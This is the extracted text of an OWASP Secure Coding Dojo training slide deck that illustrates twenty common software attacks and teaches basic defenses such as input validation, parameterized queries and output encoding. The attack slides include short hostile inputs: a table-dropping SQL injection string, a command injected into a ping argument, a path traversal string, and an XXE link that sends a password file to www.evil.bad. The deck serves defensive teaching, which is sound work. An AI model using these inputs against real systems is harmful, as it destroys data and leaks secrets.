Secure Coding for Developer

Collaboration Training

SecureC dingDojo
I. Theory

SecureC dingDojo
Agenda
1. Theory: 20 points - 90 minute
2. Hands on: 16 cases – 60 minute
Group of 2, each group 2 cases as distributed in the class.
Solve statically and dynamically (code and run).
Write a short report
3. Presentation 16 cases – 160 minute.

SecureC dingDojo
Content Creator

SecureC dingDojo
About Secure Coding Dojo
• The Secure Coding Dojo is a platform for
Secure delivering and tracking security training for
developers. The platform is created for
development organizations of all sizes: from
C ding university classrooms to large enterprises.

Dojo • The open source project is supported by Trend

Micro where it was created as a development
training tool.

• Starting with 2019 the Secure Coding Dojo has

become an OWASP project.

SecureC dingDojo
 Attack-Grams
Common Software Attacks - A Visual Journey

SecureC dingDojo
1. Authentication Bypass
Authentication Bypass occurs
when the application does not
/login /restricted
prevent unknown users from
accessing restricted
Forceful
Browsing functionality.

Regular Users Attacker

SecureC dingDojo
2. Reliance on Untrusted Inputs
2. Hello Reliance on Untrusted Inputs occurs
admin!
when the software uses client side
/restricted validation or simply stores variables
used in a security decision somewhere
1. I'm where an attacker could change them.
admin ;)

Attacker

SecureC dingDojo
3. Missing/Incorrect Authorization
Missing or Incorrect Authorization
occurs when the application does
/login /limited /admin not properly validate roles and
Forceful permissions allowing for elevation
Browsing
of privilege.

Attacker

SecureC dingDojo
4. Missing Encryption of Sensitive Data
Database
If sensitive data is not
id username password protected, a security
/login
incident will lead to a
5163 …
5164 eve ABCDEFG
5165 …
full scale data breach.
Data breach
user: eve
pass: ABCDEFG

User Attacker

SecureC dingDojo
5. Use of a Broken Crypto Algorithm
Crypto algorithms are
continuously put to
the test so we must
MD5(Expected File)=1234 keep them up to date.
Secure Server Download Server
(Not Secure) Man-in- MD5 is known to be
the-
middle
exposed to collisions
Expected File Hash
MD5, 1234 MD5
when two different
Collision files can result in the
Attack
same checksum.
MD5(Malware)=1234
User

SecureC dingDojo
6. Unsalted Hash
Database If password hashes are
id username passhash
not salted attackers can
/login 5163 … still reverse the password.
5164 eve E9A92A2…
5165 …

Precomputed hashes
value md5 sha256
user: eve Data breach
…
pass: ABCDEFG
ABCDEFG BB74… E9A92A2…
…

User Attacker

SecureC dingDojo
 7. Password Guessing
123456
A password
Lockout
password
Complexity
guessing attack is
…
ABCDEFG the simplest type of
Attacker /login
…
Try '123456' !
hack. Lack of
Common account lockout and
Passwords
lack of password
Try 'password' ! Password Policy
complexity
…
enforcements allow
such attacks to
Try 'ABCDEFG' !
happen.

SecureC dingDojo
 8. Integer Overflow
Code that makes a
security decision
Attacker … /login based on a
Credentials
attempts = 32766 comparison, is
bypassed when a
Credentials
attempts = 32767 (MAX_SHORT) counter exceeds the
maximum boundary
Credentials
attempts = -32768 (< MAX_ATTEMPTS) and resets to
negative.

SecureC dingDojo
9. Download of Code Without Integrity Check
When software is
downloaded, especially over
an insecure connection, it
Software may be replaced with
Download Server
(Not Secure) Man-in- malware. If an integrity
the-
middle
check is not used to verify
the file checksum the user
will end up executing the
replacement.
Malware
User

SecureC dingDojo
 10. Open Redirect
Sites that allow unrestricted
redirects may be leveraged in
www.trusted.good www.evil.bad
phishing attacks. The users will
trust the first part of the URL,
but the site will betray their
trust by redirecting to the evil
Phishing
Regular Users
E-mail
Attacker
page.

SecureC dingDojo
 11. Cross-Site Scripting
www.evil.bad www.trusted.good
When sites reflect user
input as is, they allow
attackers to insert
malicious scripts and
Data
alter functionality.

Regular Users Attacker

SecureC dingDojo
12. Cross-Site Request Forgery
www.trusted.good www.bank.com
Sites with sensitive
requests such as a
/transferMoney
bank money
transfer, must
prevent such
requests from being
hidden within other
sites where they will
$$$
be inadvertently
Attacker
executed by
Regular Users
unsuspecting
visitors.
SecureC dingDojo
13. Upload of Dangerous File
www.file.server
Servers that allow file
uploads must prevent
Confidential executables and
Docs
scripts from being
uploaded by
Malicious employing a file type
Web
Script
whitelist and changing
the file name and
extension after
Regular Users Attacker upload.

SecureC dingDojo
 14. XML External Entities
/DTD?pass=jmttN9YC4bK Applications that process
XML documents must
XML Processor www.evil.bad disable processing of
external entities. XML
Include /app/password External Entities can be
file as &xxe; used to leak content of
files from the host server.
Link to:
http://www.evil.bad/D
TD?pass=&xxe;
Attacker XML Document

SecureC dingDojo
 15. Path Traversal
file.txt
With Path Traversal, also
secret.txt known as a dot dot
slash attack, attackers can
../../../secret.txt
abuse a download link to
access a file from a private
file.txt
directory.

Attacker Regular Users

SecureC dingDojo
16. OS Command Injection
>_ ping ABC
Program OS Command
Operating System ping: cannot
resolve ABC:
Unknown host

ping ABC`evil.sh`
Injection lets
>_ evil.sh
attackers piggyback
> : ) malicious scripts
when programs
host: ABC`evil.sh` execute shell
commands.
Attacker

SecureC dingDojo
 17. SQL Injection
Program
SQL Database Server SQL Injection
SELECT * FROM users WHERE user='jsmith' allows attackers
DROP TABLE users

users
to insert arbitrary
database
user: jsmith'; DROP TABLE users;--' commands.

Attacker

SecureC dingDojo
18. Insecure Deserialization
Book Store
Deserialization attacks
target applications that
accept objects in binary or
text format. For the attack
>_ evil.sh
to be possible, the
application must reference
unsafe classes that
Command Book execute code when
Object Object
deserialized in the program
memory. Unfortunately
Attacker Regular Users
many commonly used 3rd
party libraries include such
SecureC ding Dojo
classes.
19. Buffer Overflow
Program
Buffer Overflow allows
attackers to cross variable
b = AAAA
b: AAAAA a = Ai!\0 boundaries and alter
program data and even
Attacker instructions.

SecureC dingDojo
 20. Format String Injection
Program
Format String Injection
Log file
allows attackers to leak
%x printf("%x") program memory by
secret = 123 123
passing unexpected
Attacker format strings to the
program.

SecureC dingDojo
 II. HANDS ON
Preventing Software Attacks
The Basic Defenses
16 Cases

SecureC dingDojo
The Tip of the Iceberg

Input
Validation Parameterized
Commands
Safe
Safe Memory functions
Encrypt
Management
Data
Indirect Object
Neutralize References
Output

SecureC dingDojo
Input Validation
• Only allow input that you are expecting
• Would you let someone in your house if you thought they
should not be there?

• Block lists are inefficient

• Would you maintain a block list of people that cannot
come to your house?
• Block listing - like giving keys to your house to everyone
except a few unwanted visitors.
SecureC dingDojo
LET'S PLAY,
SPOT THE VALIDATION
PROBLEM!
Which one of the following
codes has validation
problem?
SecureC dingDojo
CASE 1

SecureC dingDojo
 CASE 1

Answer:……

SecureC dingDojo
 CASE 2

SecureC dingDojo
 CASE 2

Answer:

SecureC dingDojo
Special Characters Not Needed
• Many parameter types not
intended to contain symbols
or punctuation Alphanumeric
• Many not even intended to
contain Unicode characters
• Parameters going into
database queries such as ID,
true/false, asc/desc have even
a smaller character set

Alphanumeric + .-_
SecureC dingDojo
Input Validation Function Example

SecureC dingDojo
A Simple Multi-Purpose Function
isAlphanumOrEx("true")
isAlphanumOrEx("desc")
isAlphanumOrEx("21845816438168")
isAlphanumOrEx("0x0709750fa566")
isAlphanumOrEx("Cr2i7nHq6qiMEs")
isAlphanumOrEx("site.local",'.')

SecureC dingDojo
 𝑰𝑰𝑰𝑰𝑰𝑰𝑰𝑰𝑰𝑰
𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽 = 𝑭𝑭( )
𝟏𝟏 + 𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽𝑽

SecureC dingDojo
Attacks Prevented by Input Validation
•Injection
•Path Traversal
•Cross-Site Scripting
•Open Redirect
•Deserialization
…
SecureC dingDojo
How About the Irish?
• Names, comments, articles, free text require
quotes:
• O'Brien, don't, "putting things in quotes"

• While input validation reduces the attack

surface, it cannot prevent all attacks

SecureC dingDojo
To sum all it up…
•Input Validation reduces the attack
surface and prevents many attack types
•Block-listing is a bad practice
•Many input types are alphanumeric
•For those input types that need special
characters we need different defenses
SecureC dingDojo
CONCATENATION
COMMAND + INPUT = INJECTION

… causes Injection!
SecureC dingDojo
CONCATENATION
Command Constant Command
Parameter 1 Input Interpreter
Parameter 2 Input

… prevent Injection!
SecureC dingDojo
LET'S PLAY,
SPOT THE
INJECTION!
SecureC dingDojo
 CASE 3

SecureC dingDojo
 CASE 3

Answer:

SecureC dingDojo
 CASE 4

SecureC dingDojo
 CASE 4

Answer:

SecureC dingDojo
ORM Frameworks
• ORM = Object Relational Mapping
• ORM Frameworks keep developers away from SQL Queries
• Popular ORM Framework: Hibernate
Object Command Constant Command
Field1 Input Parameter 1 Input Interpreter

Field2 Input Parameter 2 Input

SecureC dingDojo
To sum all it up…
•Parameterized Commands handle
situations where hazardous chars are
needed
•ORM Frameworks prevent mistakes

SecureC dingDojo
Problems with Memory
• Classic Overflow
• Incorrect Calculation of Buffer Size
• Off by One
• Format String Injection
• Use-after-free

SecureC dingDojo
Memory Safer Functions
fgets(dest_buff, BUFF_SIZE, stdin)
snprintf(dest_buff, BUFF_SIZE, format, …);
strncpy(dest_buff, src_buff, BUFF_SIZE);
strncmp(buff1, buff2, BUFF_SIZE);

If the BUFF_SIZE argument is larger than

the size of the buffer: OVERFLOW!
SecureC dingDojo
Check Boundaries
• A simple comparison against a known limit constant
can go a long way to prevent serious logical attacks.

• Pay special attention to comparison operators

• < vs <=, <= can lead to off by one

• Make sure the same constant is used to define

buffer size and check boundaries

SecureC dingDojo
Memory Injection?
• Format String Injection is a type of memory flaw caused by allowing
user input in a format parameter.

SecureC dingDojo
LET'S PLAY,
SPOT THE MEMORY
PROBLEM!
SecureC dingDojo
 CASE 5

SecureC dingDojo
 CASE 5

Answer:

SecureC dingDojo
 CASE 6

SecureC dingDojo
 CASE 6

Answer:

SecureC dingDojo
 CASE 7

SecureC dingDojo
 CASE 7

Answer:

SecureC dingDojo
 CASE 8

SecureC dingDojo
 CASE 8

Answer:

SecureC dingDojo
To sum all it up…
• Safer functions allow limiting the number of bytes
read into the buffer
• Even with safe functions special attention should be
paid to size specified, very important to use constants
to prevent mistakes
• Do not allow user input in format strings

• Careful with <= operator

SecureC dingDojo
Securing Data
• The General Data Privacy Regulation (GDPR) has put additional emphasis on
maintaining the security and privacy of data
• Data should be transmitted and stored securely
• Cryptography is one critical way to achieve this mandate
• Secure protocols: TLS 1.2, TLS 1.3
• Secure ciphers: ECDHE
• Strong digital signatures: SHA-2
• Reject invalid certificates and even more, enforce certificate pinning
• Strong authenticated symmetric encryption in transit and at rest: AES 256 GCM
• Other ways:
• Anonymize private data
• Do not collect or send private data
• Short data retention
• Ensure customer control over own data

SecureC dingDojo
LET'S PLAY,
SPOT THE
DATA BREACH!
SecureC dingDojo
 CASE 9

SecureC dingDojo
 CASE 9

Answer:

SecureC dingDojo
 CASE 10

SecureC dingDojo
 CASE 10

Answer:

SecureC dingDojo
 CASE 11

SecureC dingDojo
 CASE 11

Answer:

SecureC dingDojo
To sum all it up…
•Avoid collecting data for individuals
•Pseudonymize the data. Strong salted hashes
can be used, replace key data with *
•Use strong cryptographic algorithms
•All communication should be encrypted.
•Data classification is risky so when in doubt,
encrypt all data
SecureC dingDojo
Protect the Web UIs
• Enterprise applications are using Web UIs
• HTML is good looking, platform independent and powerful
• JavaScript libraries such as jQuery, React and Angular make
UIs responsive and versatile

SecureC dingDojo
Cross-Site Scripting (XSS)
• The ability to inject arbitrary
JavaScript into a web page
• Reflected
• Stored
• DOM based
• Easy to introduce
• Easy to find
• Leads to data breaches
through spoofing attacks

SecureC dingDojo
Defending against XSS
• Input validation ;)
• Neutralize Output
• Server Pages -> HTML Encoding (Escaping)
• < becomes &lt;
• > becomes &gt;
• " becomes &quot;

• JavaScript (DOM XSS)

• Dangerous Attributes
• innerHTML
• src
• onLoad, onClick, etc…

• Dangerous Functions
• eval
• setTimeout
• setInterval
SecureC dingDojo
HTML Encoding Neutralizes XSS

SecureC dingDojo
LET'S PLAY,
SPOT THE
XSS!
SecureC dingDojo
 CASE 12

SecureC dingDojo
 CASE 12

Answer:

SecureC dingDojo
 CASE 13

SecureC dingDojo
 CASE 13

Answer:

SecureC dingDojo
 CASE 14

SecureC dingDojo
 CASE 14

Answer:

SecureC dingDojo
 CASE 15

SecureC dingDojo
 CASE 15

Answer:

SecureC dingDojo
To sum all it up…
•XSS is easy to introduce and easy to find
•Encoding should be applied to all server
side generated content.
•Additional encoding of single quotes
required
•Dangerous HTML contexts should be
handled with care or avoided
SecureC dingDojo
Indirect Object References

2
3
SecureC dingDojo
LET'S PLAY,
SPOT THE PATH
TRAVERSAL!
SecureC dingDojo
 CASE 16

SecureC dingDojo
 CASE 16

Answer:

SecureC dingDojo
To sum all it up…
•Reduce the attack surface by enforcing
accessing objects through identifiers
rather than actual representation
•Identifiers can be input validated easier,
also solve encoding issues

SecureC dingDojo
SecureC dingDojo
Image Credits
• Image and base design elements courtesy of Pixabay.com – Royalty
Free Images (Free for commercial use, No attribution required)
• Although crediting not required we really want to thank the artists:
• 8212733 - https://pixabay.com/photos/woman-laptop-business-blogging-3190829/
• Janson_G - https://pixabay.com/photos/knight-crusader-isolated-2939429/
• mohamed_hassan - https://pixabay.com/photos/europe-gdpr-data-privacy-3256079/
Pexels - https://pixabay.com/photos/coding-computer-hacker-hacking-1841550/
• Photo Mix - https://pixabay.com/photos/house-keys-key-the-door-castle-1407562/
• PublicDomainPictures - https://pixabay.com/photos/board-card-chip-computer-data-22098/
• MTZD - https://pixabay.com/vectors/icon-file-extension-document-2488093/
• Stux - https://pixabay.com/photos/black-board-chalk-traces-school-1072366/
• StruffelProductions - https://pixabay.com/photos/code-programming-love-computer-3078609/
• TeroVasalainen - https://pixabay.com/photos/question-mark-hand-drawn-solution-2123969/
• Attack-Grams created by Paul Ionescu and distributed through the Secure Coding Dojo
project

SecureC dingDojo